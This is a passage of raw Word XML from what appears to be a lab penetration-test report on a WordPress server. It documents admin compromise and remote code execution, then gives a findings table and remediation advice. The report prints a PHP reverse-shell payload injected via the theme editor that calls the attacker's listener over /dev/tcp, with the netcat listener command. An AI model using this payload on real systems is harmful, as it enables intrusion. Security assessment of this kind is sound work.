        <w:t>wp_admin_shell_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1F0DA" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>php_xmlrpc_eval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1C55F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no stable Meterpreter session</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> was achieved due to environment and payload limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D8FD3" w14:textId="6C10BFEA" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="599F70D6" wp14:editId="4CC1CBEF">
            <wp:extent cx="5547841" cy="2232853"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1224719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9085" name="Picture 12247190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61FA" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="7FBF6EB9">
          <v:rect id="_x0000_i1157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B282DF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11. Manual PHP Reverse Shell (Successful Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5370B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Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16FB4F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>Navigated to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3EAB3" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:lastRenderedPageBreak/>
        <w:t>Appearance → Theme Editor → 404.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FCF88" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>Injected the following PHP reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B099402" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197FF775" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.56.101/4444 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44F81A" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EEEAEB" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>Started a Netcat listener on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6FB4F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3D98C" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>Triggered the payload by browsing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D8D26" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>http://192.168.56.103/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CDAF9" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="6E07BE3E">
          <v:rect id="_x0000_i1158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9591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12. Shell Access Gained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B06D7" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>A reverse shell was successfully received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682573F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Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0159F05F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72670FF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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBDA42" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50FA74" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">This confirms </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote code execution and shell access</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA52450" w14:textId="5BAD76C2" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B1E298" wp14:editId="410DF8E1">
            <wp:extent cx="5418290" cy="1478408"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="12773816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81682" name="Picture 12773816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C165" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="3A1A4749">
          <v:rect id="_x0000_i1159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FDF93C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13. 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262"/>
        <w:gridCol w:w="961"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="69424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F5FD1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1BB9C7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1B2F3DE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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="4EE5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B31B" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C60EDDA" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Sensitive files exposed via robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D916BE7" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="1067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8E29" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7CA200" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Weak credential storage (Base64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="745F8B13" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="6273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774F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:lastRenderedPageBreak/>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9C083D" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>WordPress admin compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F4CD45" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="312A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A2F5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584656B0" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Remote Code Execution via theme editor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D7874EF" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BDDCB46" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="1D2D919D">
          <v:rect id="_x0000_i1160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CC22C9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14. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F3124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Full compromise of WordPress application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED0DCA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Arbitrary command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736E4CF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Potential privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4BEA8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Data theft or service disruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42E469" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="7838028F">
          <v:rect id="_x0000_i1161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10415E8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15. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3EE02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Remove sensitive paths from robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E8675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Never store credentials in Base64 or plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74593E7F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Disable WordPress theme/plugin file editing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF820E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Enforce strong passwords and MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED0690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Regularly update WordPress core and plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272193FC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Deploy a Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3703F0" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="17C70F94">
          <v:rect id="_x0000_i1162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EDC6A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16. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A9A42" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">This assessment demonstrates how </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple misconfigurations</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">, when chained together, can lead to a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>complete system compromise</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t>. The attack required no zero-day exploits—only poor security hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067CC852" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="4AAD5C55">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1DAC74" w14:textId="50026BAE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 xml:space="preserve"> Status: Exploitation Successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DE6F6" w14:textId="5011A561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 xml:space="preserve"> Risk Level: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A35AC" w14:textId="2AE5D215" w:rsidR="003C24EE" w:rsidRDefault="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="377F54D2">
          <v:rect id="_x0000_i1187" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003C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5F7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B74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6B80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDA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2059B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91A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654"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78A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6C81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CEDC8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042B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E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27427"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF32C0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857F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70A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F7400"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E71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D49AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE8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1D8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28A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85D19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F6A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69074">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1868442883">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1332830433">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="737094553">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1060372506">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1178814364">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1391801691">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="507721151">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1840147931">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="281377954">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1293093432">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1701668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EE"/>
    <w:rsid w:val="003C24EE"/>
    <w:rsid w:val="00D7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A106E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D005341B-7776-4803-9A9F-056E4996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Prakanth Vijayakumar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-20T13:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-20T13:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>